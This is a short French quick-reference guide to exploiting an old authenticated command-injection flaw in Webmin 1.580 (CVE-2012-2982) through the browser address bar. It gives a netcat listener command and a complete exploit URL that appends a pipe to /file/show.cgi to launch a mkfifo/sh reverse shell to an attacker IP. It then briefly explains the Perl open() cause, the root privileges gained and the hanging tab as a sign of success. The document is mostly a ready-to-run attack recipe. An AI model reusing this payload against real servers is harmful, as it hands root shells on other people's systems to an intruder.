
Exploit manuel d'exécution de code à distance (RCE) authentifiée, sans Metasploit, via la barre d'URL du navigateur pour Webmin 1.580 (CVE-2012-2982)
Référence rapide pour réaliser une exécution de code à distance (RCE) authentifiée sur Webmin 1.580 via le composant /file/show.cgi.
Exécutez cette commande sur votre machine locale pour intercepter la connexion entrante avant d'exécuter le payload :
rlwrap nc -lnvp 4444
http://127.0.0.1:10001/file/show.cgi/bin/sysinfo.cgi|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_ATTACK_IP> 4444 >/tmp/f|
Remarque : pensez à remplacer <YOUR_ATTACK_IP> par votre adresse IP locale ou de tunnel réelle, AINSI QUE l'IP et le PORT de la cible.

Contexte et détails Vulnérabilité : assainissement insuffisant des informations de chemin intégrées transmises à la fonction open() interne de Perl dans /file/show.cgi. L'ajout du caractère pipe (|) permet l'exécution de commandes arbitraires avec les privilèges root.
Authentification : ceci nécessite une session active. Le navigateur gère automatiquement l'authentification en envoyant les cookies de votre session active lorsque vous soumettez le payload via l'URL.
Comportement attendu : après avoir appuyé sur Entrée, l'onglet du navigateur tournera et semblera se bloquer indéfiniment. Cela confirme que le thread du serveur a été détourné avec succès pour maintenir la session shell interactive.